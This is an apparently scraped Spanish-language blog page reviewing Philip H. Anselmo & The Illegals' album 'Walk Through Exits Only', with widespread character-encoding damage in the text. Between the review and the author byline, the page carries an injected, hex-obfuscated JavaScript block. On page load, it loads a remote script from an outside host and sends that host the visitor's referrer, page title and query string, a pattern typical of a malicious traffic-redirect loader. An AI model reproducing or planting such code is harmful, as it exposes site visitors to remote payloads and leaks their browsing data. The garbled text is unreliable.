The Filthy Points on Narrative Essay https://t.co/DL10YsHX6O
- Viernes nov 16 - 8:55am


Philip H. Anselmo & The Illegals – ‘Walk Through Exits Only’ (2013)

Philip H. Anselmo & The Illegals - 'Walk Through Exits Only' (2013)

Philip H. Anselmo & The Illegals – ‘Walk Through Exits Only’ (2013)

Artista: Philip H. Anselmo & The Illegals
TA�tulo:A�‘Walk Through Exits Only’
GA�nero: Thrash/Metal/Groove
Lanzamiento: 19 de julio, 2013
Sello: Housecore
CalificaciA?n:A�3/5
Comprar en:

Nuevo proyecto del Sr. Philip Anselmo con el cual ya venA�a trabajando en A�l a mediados del 2012, con la participaciA?n de Marzi Montazeri en la guitarra, colaborador en Superjoint Ritual,Bennett Bartley en el bajo y Joe Gonzales de Warbeast en la baterA�a.

Este trabajo es diferente a sus proyectos mA?s notorios en su carrera como Down y Superjoint Ritual, recordA?ndome a un estilo que le quiso dar vida una banda llamada Dim Mak por ahA� del 2002 con miembros de Pissing Razors bautizA?ndolo como Cobra-Core, que no paso a mayores dentro del medio.

Philip H. Anselmo & The IllegalsA�definen su estilo y potencial desde la primera canciA?n del A?lbum a�?Music Media Is My Whorea�?, de ahA� los movimientos en los acordes y la voz varA�an muy poco, pero no dejan de ser un gran experimento, aunque no vamos a encontrar nada de Pantera si es lo que esperamos.

Compuesto por ocho canciones en total ‘Walk Through Exits Only’ se convierte en una vertiente de adrenalina en cada track, destacA?ndose canciones como a�?Battalion Zeroa�?A�y a�?Bedroom Destroyera�?.

No puedo cegarme ni dejarme impresionar solo porque Phill Anselmo estA? detrA?s de todo esto, pero la monotonA�a se adueA�a de este A?lbum de manera importante y aunque no son muchas canciones hay veces que si no se pone mucha atenciA?n se suele perderse entre canciones, lo califico con un 3/5.

http://www.youtube.com/watch?feature=player_detailpage&v=zpK-4VC5ztw

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Alejandro Corral (@alejandrofran11)

Alejandro Corral (@alejandrofran11)

Redactor, especialidad en Metal y variantes.

, , , , , , , , ,

Deja tus comentarios